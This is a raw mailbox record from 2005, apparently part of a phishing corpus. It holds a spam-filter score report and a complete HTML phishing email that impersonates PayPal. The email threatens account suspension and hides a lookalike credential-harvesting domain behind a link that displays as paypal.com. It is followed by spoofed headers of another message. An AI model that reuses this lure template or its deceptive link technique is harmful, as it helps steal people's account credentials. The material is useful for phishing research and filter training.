	*  0.0 NO_REAL_NAME From: does not include a real name
	*  0.1 MISSING_HEADERS Missing To: header
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf:  60]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  0.6 FORGED_OUTLOOK_HTML Outlook can't send HTML message only
	*  0.1 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
	*  3.9 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
Message-Id: <20051013011806.892606FA3DF@mail2.monkey.org>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 343

<HTML>
<A href="http://www.paypal.com.cgi-bin.webscr-run.login.aspx-account-uptade.futuristic-perception.co.uk/.paypal-account/"><IMG src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" border=0></A>  
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD colSpan=3><IMG height=2 src="pp.files/pixel.gif" width=2></TD></TR></TBODY></TABLE>
<P><FONT size=2><FONT face=Verdana>Dear valued <STRONG><STRONG><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">PayPal<SUP>®</SUP></SPAN></STRONG> </STRONG>member</FONT>: <BR></FONT><BR></P>
<P><FONT face=Verdana size=2>It has come to our attention that your <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>®</SUP></STRONG></SPAN> account information needs to be <BR>updated as part of our continuing commitment to protect your account and to <BR>reduce the instance of fraud on our website. </FONT><FONT face=Verdana size=2><FONT face=Verdana size=2> If you could please take 5-10 minutes <BR>out of your </FONT><FONT face=Verdana size=2>online </FONT><FONT face=Verdana size=2>experience and update your personal records you will not run into <BR>any future </FONT><FONT face=Verdana size=2>problems with the online service. <BR>                                     </FONT></P>
<P><FONT face=Verdana size=2>However, failure to update your records will result in account suspension. <BR>Please update your records on or before <FONT color=red><STRONG>Octomber 14, 2005</STRONG>.</FONT> <BR><BR>Once you have updated your account records, your <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>®</SUP></STRONG></SPAN> session will not be <BR>interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your <SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>®</SUP></STRONG></SPAN> records click on the following link: <BR></FONT><A href="http://www.paypal.com.cgi-bin.webscr-run.login.aspx-account-uptade.futuristic-perception.co.uk/.paypal-account/" target=_self><FONT face=Verdana size=2>http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</FONT></A></P>
<P><FONT face=Verdana size=2></FONT> </P>
<P><FONT face=Verdana size=2>Thank You.  <BR><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>PayPal<SUP>® </SUP><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">UPDATE </SPAN></STRONG><SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana"><STRONG>TEAM</STRONG></SPAN></SPAN>                                     </P>

From supportteam@paypal.com  Thu Oct 13 05:26:54 2005
Return-Path: <supportteam@paypal.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id F2661536E25
	for <jose@login.monkey.org>; Thu, 13 Oct 2005 05:26:53 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 18C706FA375
	for <jose@monkey.org>; Thu, 13 Oct 2005 05:26:36 -0400 (EDT)
Received: from hotwire-71-178-16-del.hotwireindia.com (unknown [61.16.178.71])
	by mail2.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Thu, 13 Oct 2005 05:26:35 -0400 (EDT)
Received: by 61.16.178.71 (Postfix, from userid 01828790)
	 id i171R1xVkmvBKMCC; Thu, 13 Oct 2005 07:18:34 -0300
Received: from [248.240.176.253] (port=3428 helo=mail.nm.ru)
	by mail.nm.ru with esmtp 
	id 4q0CZDrYfq
	for supportteam@paypal.com; Thu, 13 Oct 2005 13:25:34 +0300
Received: from 116.243.88.104 by web341.mail.yahoo.com; Thu, 13 Oct 2005 11:25:34 +0100
Message-ID: <FXZANIKYIEOBMEASQYRARGUWX@nm.ru>
